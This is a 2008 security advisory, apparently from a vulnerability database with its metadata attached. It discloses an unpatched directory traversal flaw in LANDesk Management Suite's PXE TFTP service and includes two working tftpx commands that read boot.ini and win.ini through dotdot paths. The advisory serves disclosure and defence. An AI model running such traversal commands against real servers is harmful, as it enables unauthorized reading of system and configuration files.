Directory traversal in LANDesk Management Suite 8.80.1.1

2008-04-03T00:00:00

Description

####################################################################### Luigi Auriemma Application: LANDesk Management Suite http://www.landesk.com/products/ldms/index.aspx Versions: <= 8.80.1.1 Platforms: Windows Bug: directory traversal Exploitation: remote Date: 01 Apr 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== LANDesk is a well known system management software. ####################################################################### ====== 2) Bug ====== The PXE TFTP Service is vulnerable to a classical directory traversal vulnerability exploitable through the adding of one or more chars before the usual dotdot pattern. The interesting thing is that version 8.80.1.1 has been released just to fix another directory traversal vulnerability. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/tftpx.zip tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none tftpx SERVER what_you_want/../../../../../../../windows/win.ini none ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org

{"id": "SECURITYVULNS:DOC:19555", "bulletinFamily": "software", "title": "Directory traversal in LANDesk Management Suite 8.80.1.1", "description": "\r\n#######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: LANDesk Management Suite\r\n http://www.landesk.com/products/ldms/index.aspx\r\nVersions: <= 8.80.1.1\r\nPlatforms: Windows\r\nBug: directory traversal\r\nExploitation: remote\r\nDate: 01 Apr 2008\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bug\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\nLANDesk is a well known system management software.\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\n\r\nThe PXE TFTP Service is vulnerable to a classical directory traversal\r\nvulnerability exploitable through the adding of one or more chars\r\nbefore the usual dotdot pattern.\r\n\r\nThe interesting thing is that version 8.80.1.1 has been released just\r\nto fix another directory traversal vulnerability.\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/tftpx.zip\r\n\r\n tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none\r\n tftpx SERVER what_you_want/../../../../../../../windows/win.ini none\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nNo fix\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n--- \r\nLuigi Auriemma\r\nhttp://aluigi.org", "published": "2008-04-03T00:00:00", "modified": "2008-04-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19555", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 24, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8858"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8858"]}]}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645438034, "score": 1659803227}, "_internal": {"score_hash": "9b8e8e66ab8d9d92d4daaabda71c4c0a"}}